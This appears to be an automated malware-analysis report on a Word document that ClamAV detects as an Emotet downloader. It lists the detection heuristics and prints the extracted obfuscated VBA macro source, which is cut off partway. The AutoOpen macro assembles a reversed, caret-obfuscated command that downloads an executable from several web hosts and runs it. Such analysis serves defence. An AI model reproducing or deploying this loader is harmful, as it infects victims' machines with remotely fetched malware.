Malware Insights
The sample contains critical heuristics for VBA macros and a Shell() call, strongly indicating malicious intent. ClamAV identifies it as 'Doc.Downloader.Emotet-6884067-0'. The VBA script, though obfuscated, contains elements that suggest it attempts to download and execute a second-stage payload, likely leveraging the reconstructed command string 'cmd /V:O /C "set Z5IA= } {kaerb;Amd$^ " ;Amd$^ ,adq$(elifd aoln w oD.FCC ${yr t {)DR F$^ n i adq$(hcaero f;' ex e.'+VVM$+'\' + cilbup:vne$^ =Amd$^;'536' = VV M$^;)^'@'(tilpS.^'hFzgH Jm/yb.xul-arolf.www//:ptth@wkqXjOG/ku.'
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884067-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884067-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4418 bytes |
SHA-256: 1f754dcb354c1f1e184634abdbd5c59b1d73d6d60126f3331374c2641c22a360 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZIhIpmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If ozvjrE Xor GtljZ Then
wauzF = "OCFSwJ"
End If
If pmJTl <= 12 Then
ALJWOw = "kNRVZf"
End If
If pdoLt = shwdrl Then
umfnIY = "DBpGtYXJbwiSEY"
End If
If Hstwwk >= mChjq Then
irztwI = "YkjSCRR"
End If
jmHtqvtib (KeyString(mVWBG + hwZbkZU + 17 + 19 + 31 + vwIkQY + wdpow) + BJmAnzj + dcXoWj + KeyString(jEdjFZlN + Ddquka + 20 + 21 + 36 + bnUwULi + oAvlO) + wmwaJ + morOjcjH + bOfhVCUKH + fkwzPzSQ + qwnOItzK)
If hRVPjG <= wZjJh Then
mIXczn = "Wp"
End If
End Sub
Attribute VB_Name = "jMohWYEOYPKN"
Function wmwaJ()
If YXKTOi <= VsFua Then
pNYloM = "fTbIlX"
End If
If lIODrc <= iGzwwr Then
amffN = "BGpnuFFjcjduo"
End If
RLluMEkdW = "d /V^:^O/C" + """" + "^s^e^t Z^5^I^A=^ " + "^ ^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^}^" + "}^{hc^tac^}^;^k^a^e" + "r^b^;^A^m^d^$^ ^"
If TDIhR And PULzQ Then
lzhziH = "PLsGbiGEvBhra"
End If
RhwDw = "m^e^t^I^-^" + "e^k^ovn^I^;" + ")^A^m^d^$^ ^,^a^d^" + "q$(^e^li^F^d^ao^ln^"
If fzLiB > 12 Then
baQNnw = "Eq"
End If
If zhCLzU > 13 Then
dIqwm = "jNlbGQI"
End If
If Bmtjn = 7 Then
DZpwhu = "uJGQKm"
End If
QjOEVlZOJ = "w^o^D^.^FCC^$^{^yr^" + "t^{)DR^F^$^ n^i^ ^a^" + "d^q^$(hc^a^er^" + "o^f^;^'^e^xe^.^'^+V"
NCBWTpJz = "V^M^$^+^'^\^'" + "+c^il^b^u^p^:vn^e^$^" + "=^A^m^d^$^;'" + "^5^36^'^ ^=^ VV^" + "M^$^;)^'^@^'(^t^i^l^" + "pS^.^'^h^F^z^g^H"
If kwjFiI <= NvVpDV Then
JfCFz = "Sa"
End If
wtwiFzXM = "^J^m/^y^b^.^x^u^" + "l^-^ar^o^l^" + "f^.w^w^w//^:p^t^t^h^" + "@^w^k^q^X^jO^G/k" + "^u^.^oc^.c^"
UlzhYbfWU = "p^4^xi^f^.^w^w^w" + "//:^p^tt^h^@^Pw1r" + "^t^8/r^b^.^m" + "^oc^.^s^a^o^g^al^et" + "e^sr^a^s^s"
wmwaJ = RLluMEkdW + RhwDw + QjOEVlZOJ + NCBWTpJz + wtwiFzXM + UlzhYbfWU
If sOoDH <> kobPc Then
sQuPBK = "CZIGAdYuY"
End If
If knYBlV >= LJtzjw Then
Vlmaj = "jinvdrwdfiw"
End If
If izDTFv >= ifRwzI Then
LKkaC = "dT"
End If
If kzbbJ <= 16 Then
GQmYVk = "ODlnwFl"
End If
End Function
Function morOjcjH()
If oTVkC Or 14 Then
jLfWn = "HwBlJNijcLQDj"
End If
If jHnaiP <= pukih Then
KzhTf = "EZAs"
End If
GPLWG = "^er^p^x^e^.w^w^w" + "//^:p^t^t^h@3O^T^" + "54^ec/^s^e^."
If sWdXR Or YvACFu Then
VEiHR = "sswFqUzv"
End If
If nOiPw And uwrFs Then
wVtnL = "LiMTQnNIpdD"
End If
kCljiPYmQi = "^er^e^k^e^t^.^w" + "^w^w//^:^p^t^t^h@" + "^E^p^g^6^I/^" + "m^oc^.^p^u^i"
If zmYjv > dsPiFS Then
pElivI = "Pnc"
End If
If ZLuRmC Or sXFjk Then
VCVCM = "o"
End If
If DKwHNa Xor zTMIs Then
GiOfp = "f"
End If
If NRQiM Eqv UqMKco Then
ahlCIh = "fdwt"
End If
If RtZBz > Vwczm Then
LjHYMS = "ai"
End If
AMEHQYXnFZ = "^gn^a^ba^u^m.^w^w" + "^w//^:^p^t^" + "t^h^'^=^DR^F^$^" + ";^tn^e^i^lC^b"
morOjcjH = GPLWG + kCljiPYmQi + AMEHQYXnFZ
If POIht > 16 Then
szZpjU = "zXFbFOj"
End If
If tkzbQ Eqv 18 Then
izfqj = "rddz"
End If
End Function
Function bOfhVCUKH()
IjQDz = "^e^W^.^t^eN^ ^t" + "c^e^j^b^o^-^w^en^=" + "^FCC^$ ^l^l^e" + "^h^sr^ew^o^p&&^f^" + "or /^L %^s " + "^in (^3^7^9^,^-^1"
If UwHhnG > skwoO Then
EzsMR = "ra"
End If
If sNKTjq Xor 14 Then
CYkODb = "i"
End If
If Episk >= oXmhrp Then
MuFGoa = "uznIjOKPmOnYku"
End If
If dBuTu < 9 Then
rCdwiP = "RMqKj"
End If
wPFDGOqvr = "^,^0)^d^o ^s^e" + "^t ^U^2^y=" + "!^U^2^y!!Z^5" + "^I^A:~%^s,1!&&^i^f" + " %^s=^=^0 c^a^l^l %^" + "U^2^y:^~^-^3^8"
EHTkqQON = "^0%" + """" + ""
bOfhVCUKH = IjQDz + wPFDGOqvr + EHTkqQON
If mvpnA <> CXoco Then
KZWQQ = "wr"
End If
If PYkYt And EpJBv Then
DICVwF = "QzizZEl"
End If
If KwkwWk = LTHuED Then
MHsnG = "hTR"
End If
If NlSwZ Xor hXPPf Then
MJCAk = "GCV"
End If
End Function
Attribute VB_Name = "jQJwTrFjI"
Function jmHtqvtib(RAfflt As String)
Const cshrXuVAjC = 264242985 - 264242985
If lRCWj >= sKniW Then
ScAcu = "Tb
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.